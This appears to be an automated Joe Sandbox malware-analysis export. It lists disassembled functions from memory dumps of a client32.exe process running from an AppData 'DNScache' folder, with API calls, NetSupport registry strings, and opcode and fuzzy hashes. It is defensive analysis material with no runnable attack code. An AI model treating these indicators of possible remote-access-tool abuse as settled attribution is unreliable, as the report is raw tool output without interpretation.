SOFTWARE\Productive Computer Insight\PCICTL, xrefs: 11141707, 1114173E

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
API String ID: 47109696-3245241687
Opcode ID: 99a9639f8b5a3cd35e38661cbd72eb469aa7efbae8eec8b92f355b84edb3575c
Instruction ID: 91be659002a641db8a89ab9a21f7cfc48618381207bd1d2684db2ae3e6416916
Opcode Fuzzy Hash: 99a9639f8b5a3cd35e38661cbd72eb469aa7efbae8eec8b92f355b84edb3575c
Instruction Fuzzy Hash: 79219B75F0062A9FE720DAA4CD80FEAF7B9AB44715F2041AAD91DF3180E731BD458B61

Function 1110E580 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 1110E4E0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E50A
Part of subcall function 1110E4E0: __wsplitpath.LIBCMT ref: 1110E525
Part of subcall function 1110E4E0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E559

GetComputerNameA.KERNEL32(?,?), ref: 1110E628

Strings

, xrefs: 1110E621
\Registry\Machine\SOFTWARE\Classes\N%x, xrefs: 1110E5D0
\Registry\Machine\SOFTWARE\Classes\N%x.%s, xrefs: 1110E637
ACM, xrefs: 1110E5E2

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
API String ID: 806825551-1858614750
Opcode ID: 183f370caf69bbe17c6082279daca77b7293399848dc477f308e72684283830f
Instruction ID: 2ab1a5a8d67e4daa57ccfa6bc840e6a71df33f8eb624919f4b1bd86a919bc0c5
Opcode Fuzzy Hash: 183f370caf69bbe17c6082279daca77b7293399848dc477f308e72684283830f
Instruction Fuzzy Hash: 82212672E052A55BD701CE769D80BFFFFBA9B85208F0849A8E855D7142F636E904C790

Function 111405A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 1113FFC0: GetCurrentProcess.KERNEL32(110290EF,?,11140213,?), ref: 1113FFCC
Part of subcall function 1113FFC0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\DNScache\client32.exe,00000104,?,11140213,?), ref: 1113FFE9

WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111405F5
ResetEvent.KERNEL32(00000254), ref: 11140609
SetEvent.KERNEL32(00000254), ref: 1114061F
WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114062E

Strings

MiniDump, xrefs: 111405A7

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
String ID: MiniDump
API String ID: 1494854734-2840755058
Opcode ID: 74d181cba482439661d7d5458db5f0f90b1b5973d406018fe50245269e24acaf
Instruction ID: a18e6ec93f2f51a70a4194e0933b1d17668afa145907d141e06e252061f61c7d
Opcode Fuzzy Hash: 74d181cba482439661d7d5458db5f0f90b1b5973d406018fe50245269e24acaf
Instruction Fuzzy Hash: 6E112C7190012677D701DFE69C81F9EF768AB04B28F204231F620D71C8D771A50187F5

Function 6C3C8E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 6C3C5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C3C5014
Part of subcall function 6C3C5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C3C8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C3C5034

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C3C8EAE
FreeLibrary.KERNEL32(?), ref: 6C3C8EBF

Part of subcall function 6C3C2420: _strrchr.LIBCMT ref: 6C3C242E

Strings

NSM247Ctl.dll, xrefs: 6C3C8E7E
pcictl_247.dll, xrefs: 6C3C8E6C
Set Is247=%d, xrefs: 6C3C8ED7

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
API String ID: 3215810784-3459472706
Opcode ID: e098198a640bdda50632114b1ec4e133a8508964d48a3f309adb3bece2f66516
Instruction ID: b3962c1f4de6437a5e928a3017f71cc7c02e60eee4a874546530dfe73a5d3027
Opcode Fuzzy Hash: e098198a640bdda50632114b1ec4e133a8508964d48a3f309adb3bece2f66516
Instruction Fuzzy Hash: E911B971B401159BDB10DB61ED45FEE7378AB4530AF00046ADE49A7A40EB329E49CF63

Function 111430E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 1114310F
wsprintfA.USER32 ref: 11143146

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

i < _tsizeof (buf), xrefs: 11143160
#%d, xrefs: 11143140
..\ctl32\util.cpp, xrefs: 1114315B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastLoadMessageProcessString
String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
API String ID: 1985783259-2296142801
Opcode ID: 50f03ae9888073d648264a02d0f2898704c8c145e373352b4e215a8d93f9feb0
Instruction ID: f51f52dcbd712469e4e57ed30d3ae6ecd606de78ecfb21ce2ea79b628c9a40ce
Opcode Fuzzy Hash: 50f03ae9888073d648264a02d0f2898704c8c145e373352b4e215a8d93f9feb0
Instruction Fuzzy Hash: 0B1108FAD012396BD710DAA5DD80FEAF37C9B44B18F004165FB09F7141E630AA01C7A5

Function 1110C4B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1110C4C9

Part of subcall function 1115F231: __FF_MSGBANNER.LIBCMT ref: 1115F24A
Part of subcall function 1115F231: __NMSG_WRITE.LIBCMT ref: 1115F251
Part of subcall function 1115F231: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F276

wsprintfA.USER32 ref: 1110C4E4

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

_memset.LIBCMT ref: 1110C507

Strings

..\ctl32\Refcount.cpp, xrefs: 1110C4F5
Can't alloc %u bytes, xrefs: 1110C4DE

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
API String ID: 3234921582-2664294811
Opcode ID: e0bb211f859f2fa949f44d2096963267122c0da9ac3aa2b0a4827efdede835e6
Instruction ID: b630a7bce2d8b31bd129a4a0d869a60b14261a6ec7c13124e9a87005b2231114
Opcode Fuzzy Hash: e0bb211f859f2fa949f44d2096963267122c0da9ac3aa2b0a4827efdede835e6
Instruction Fuzzy Hash: 79F02BB9E0112977C7119AA9AC81FEFF7BC8F81608F4001A9FF05A7141E935AA02C7D5

Function 6C3DDBD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6C3DDBE9

Part of subcall function 6C3E1B69: __FF_MSGBANNER.LIBCMT ref: 6C3E1B82
Part of subcall function 6C3E1B69: __NMSG_WRITE.LIBCMT ref: 6C3E1B89
Part of subcall function 6C3E1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C3ED3C1,6C3E6E81,00000001,6C3E6E81,?,6C3EF447,00000018,6C407738,0000000C,6C3EF4D7), ref: 6C3E1BAE

wsprintfA.USER32 ref: 6C3DDC04
_memset.LIBCMT ref: 6C3DDC27

Strings

Refcount.cpp, xrefs: 6C3DDC15
Can't alloc %u bytes, xrefs: 6C3DDBFE

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc_memsetwsprintf
String ID: Can't alloc %u bytes$Refcount.cpp
API String ID: 2405090531-3988092936
Opcode ID: 6a6395b2a8ebd1a4560db547feec6710f5bde5cd221972b081e6120ffaedc415
Instruction ID: 8cb392cfe69d960e70c7f9b31aeaeaf70fcf7e3eb3c6fbe0d73843c38c1426e4
Opcode Fuzzy Hash: 6a6395b2a8ebd1a4560db547feec6710f5bde5cd221972b081e6120ffaedc415
Instruction Fuzzy Hash: 8DF0FCB2B4011867C710FB649D01FDF777C9F45604F000159EE05AB242D735AA158BD7

Function 11031200 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110312B6

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

clientinv.cpp, xrefs: 1103122E
124406, xrefs: 11031297
m_pDoInv == NULL, xrefs: 11031233
%s%s.bin, xrefs: 110312B0

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessageProcess
String ID: %s%s.bin$124406$clientinv.cpp$m_pDoInv == NULL
API String ID: 4180936305-130860707
Opcode ID: 0600f11bd2072c8e9e1e84ca6c39a1e608bde180830712b07c531cb0d481db3a
Instruction ID: 2341575681f6e1d693b2af78dd19dca744ecd147650d17c5e1ce5a0d9c930bd8
Opcode Fuzzy Hash: 0600f11bd2072c8e9e1e84ca6c39a1e608bde180830712b07c531cb0d481db3a
Instruction Fuzzy Hash: 78218EB5E00705AFD710DF65DC80BABB7E4EB89718F10856EF825D7681EA34A8108B55

Function 6C3E49F7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6C3E4A05

Part of subcall function 6C3E1B69: __FF_MSGBANNER.LIBCMT ref: 6C3E1B82
Part of subcall function 6C3E1B69: __NMSG_WRITE.LIBCMT ref: 6C3E1B89
Part of subcall function 6C3E1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C3ED3C1,6C3E6E81,00000001,6C3E6E81,?,6C3EF447,00000018,6C407738,0000000C,6C3EF4D7), ref: 6C3E1BAE

_free.LIBCMT ref: 6C3E4A18

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 32e2e944f0db42de4f1a270ec807d46fbae1d1e3b360c09f3cbbff5d82cd6f38
Instruction ID: 03acdd66e8c9777f7c459de41162fcd86f892aad0e7acb6da2b58d203d7b5435
Opcode Fuzzy Hash: 32e2e944f0db42de4f1a270ec807d46fbae1d1e3b360c09f3cbbff5d82cd6f38
Instruction Fuzzy Hash: 1C11EE325485399ECB116FF9A8046C93779AF4D378B10412BE549EAE40EF3688404F99

Function 11140A10 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(111410E8,00000000,?,111410E8,00000000), ref: 11140A2C
__strdup.LIBCMT ref: 11140A47

Part of subcall function 11080C50: _strrchr.LIBCMT ref: 11080C5E

Part of subcall function 11140A10: _free.LIBCMT ref: 11140A6E

_free.LIBCMT ref: 11140A7C

Part of subcall function 1115F2C5: HeapFree.KERNEL32(00000000,00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2DB
Part of subcall function 1115F2C5: GetLastError.KERNEL32(00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2ED

CreateDirectoryA.KERNEL32(111410E8,00000000,?,?,?,111410E8,00000000), ref: 11140A87

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
String ID:
API String ID: 398584587-0
Opcode ID: a0b33b1edd81cd64c1d8e3759cbead4e3aae10ac1418d4c544b38f7ea69fe648
Instruction ID: 1c08e647dc052b0ac3e89a50278392bb41baddc2a410cc77f75d714db07cb266
Opcode Fuzzy Hash: a0b33b1edd81cd64c1d8e3759cbead4e3aae10ac1418d4c544b38f7ea69fe648
Instruction Fuzzy Hash: AE01F57E7002171AF301157E6D05BEBBB8C8BD2AA8F348636E85DC6585F752E00641A2

Function 1100EC80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100ECB2

Part of subcall function 1115CF04: _setlocale.LIBCMT ref: 1115CF16

_free.LIBCMT ref: 1100ECC4

Part of subcall function 1115F2C5: HeapFree.KERNEL32(00000000,00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2DB
Part of subcall function 1115F2C5: GetLastError.KERNEL32(00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2ED

_free.LIBCMT ref: 1100ECD7
_free.LIBCMT ref: 1100ECEA
_free.LIBCMT ref: 1100ECFD

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 79d1fb3316b6a809dc4fbc7e172a240c417b5edfee08efaec5b4f9c643edd506
Instruction ID: ed4591471b6a58c1ebc1a21eb0d0f69f60c5da075d19e0a110d3e1ee802c5437
